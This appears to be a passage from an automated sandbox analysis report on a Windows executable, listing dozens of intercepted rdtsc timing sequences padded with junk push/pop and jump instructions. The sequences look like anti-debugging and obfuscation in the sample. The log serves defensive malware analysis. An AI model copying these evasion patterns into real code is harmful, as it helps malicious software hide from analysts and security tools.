              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D005 second address: 137D009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1381B81 second address: 1381B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1381B87 second address: 1381B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13150B0 second address: 13150B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13150B6 second address: 13150BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386D73 second address: 1386D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FEA188F2DBCh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386D9F second address: 1386DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386DA8 second address: 1386DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389219 second address: 1389249 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA188A9BD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jnc 00007FEA188A9BDCh 0x00000012 jl 00007FEA188A9BDCh 0x00000018 jl 00007FEA188A9BD6h 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389249 second address: 138924D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138924D second address: 138927B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FEA188A9BD8h 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FEA188A9BDAh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138927B second address: 1389285 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEA188F2DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138937D second address: 13893D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FEA188A9BD6h 0x00000009 jmp 00007FEA188A9BE3h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FEA188A9BE1h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007FEA188A9BE9h 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13894EE second address: 1389505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188F2DC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389505 second address: 1389517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FEA188A9BD6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389517 second address: 138951B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138951B second address: 1389550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FEA188A9BEBh 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEA188A9BDDh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A822 second address: 138A830 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA188F2DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A830 second address: 138A83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FEA188A9BD6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A83A second address: 138A842 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A842 second address: 138A847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A847 second address: 138A86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DC0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jnl 00007FEA188F2DB6h 0x00000013 jo 00007FEA188F2DB6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13919DC second address: 13919E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13919E0 second address: 13919FC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA188F2DB6h 0x00000008 jmp 00007FEA188F2DC2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13919FC second address: 1391A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391A02 second address: 1391A3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEA188F2DC7h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 jnc 00007FEA188F2DB6h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390713 second address: 139071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390D8D second address: 1390D97 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEA188F2DB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390F13 second address: 1390F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390F19 second address: 1390F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390F26 second address: 1390F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391350 second address: 1391356 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391356 second address: 139136A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007FEA188A9BD8h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139136A second address: 139136E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139136E second address: 1391374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391374 second address: 1391385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FEA188F2DB6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391684 second address: 1391693 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007FEA188A9BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391693 second address: 139169A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139169A second address: 13916AC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEA188A9BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13916AC second address: 13916B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13916B0 second address: 13916BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13916BE second address: 13916C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FEA188F2DB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E7EB second address: 135E840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jl 00007FEA188A9BD6h 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 call 00007FEA188A9BE3h 0x00000017 sbb edx, 037EB3BBh 0x0000001d pop ecx 0x0000001e lea eax, dword ptr [ebp+1248259Ah] 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007FEA188A9BD8h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 pushad 0x00000043 popad 0x00000044 pop ecx 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E840 second address: 135E84B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FEA188F2DB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E84B second address: 135E86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEA188A9BE5h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E86A second address: 1344BD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FEA188F2DB6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FEA188F2DB8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 call dword ptr [ebp+122D1EE2h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push ebx 0x00000034 pop ebx 0x00000035 js 00007FEA188F2DB6h 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E9F4 second address: 135E9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E9F8 second address: 135E9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E9FC second address: 135EA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FEA188A9BD8h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 jno 00007FEA188A9BD6h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135EA19 second address: 135EA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135EDF6 second address: 135EE2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FEA188A9BD6h 0x00000009 jmp 00007FEA188A9BDFh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [esp], 64C3594Fh 0x00000018 mov dword ptr [ebp+1245CC4Ah], eax 0x0000001e push E407C20Ah 0x00000023 push eax 0x00000024 push edx 0x00000025 jo 00007FEA188A9BD8h 0x0000002b push eax 0x0000002c pop eax 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135EE2D second address: 135EE33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135EE33 second address: 135EE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F850 second address: 135F854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F854 second address: 135F85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FB33 second address: 135FB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FB38 second address: 135FBA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FEA188A9BD8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D37F5h], eax 0x0000002a lea eax, dword ptr [ebp+1248259Ah] 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FEA188A9BD8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jno 00007FEA188A9BD6h 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FBA6 second address: 135FBAC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FBAC second address: 1345688 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FEA188A9BD8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 pushad 0x00000027 push edx 0x00000028 call 00007FEA188A9BE9h 0x0000002d pop ebx 0x0000002e pop ecx 0x0000002f stc 0x00000030 popad 0x00000031 call dword ptr [ebp+1245C6C0h] 0x00000037 jl 00007FEA188A9BFDh 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FEA188A9BE1h 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1345688 second address: 1345695 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEA188F2DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1345695 second address: 13456B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FEA188A9BE2h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13456B0 second address: 13456B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13456B6 second address: 13456C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEA188A9BD6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13456C0 second address: 13456C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131364F second address: 1313659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEA188A9BD6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313659 second address: 131365F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131365F second address: 1313665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313665 second address: 131367D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA188F2DC2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131367D second address: 1313681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313681 second address: 1313697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1398F9C second address: 1398FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1398FA2 second address: 1398FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13990D9 second address: 13990EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FEA188A9BD6h 0x0000000f jg 00007FEA188A9BD6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13990EE second address: 13990F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13990F2 second address: 139912A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FEA188A9BE6h 0x0000000c jmp 00007FEA188A9BE0h 0x00000011 popad 0x00000012 jc 00007FEA188A9C00h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FEA188A9BE3h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13992E0 second address: 13992E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13992E4 second address: 13992FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13992FD second address: 1399303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399303 second address: 139930D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEA188A9BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139930D second address: 139934D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DBCh 0x00000007 jmp 00007FEA188F2DBFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEA188F2DBDh 0x00000015 jbe 00007FEA188F2DC2h 0x0000001b jnl 00007FEA188F2DB6h 0x00000021 jc 00007FEA188F2DB6h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139934D second address: 1399359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FEA188A9BD6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399745 second address: 1399749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399891 second address: 13998A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399A0C second address: 1399A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399A12 second address: 1399A18 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399A18 second address: 1399A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E986 second address: 139E98C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E98C second address: 139E990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A4350 second address: 13A436C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEA188A9BDEh 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FEA188A9BD6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A325B second address: 13A3279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FEA188F2DC8h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A3279 second address: 13A3283 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA188A9BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
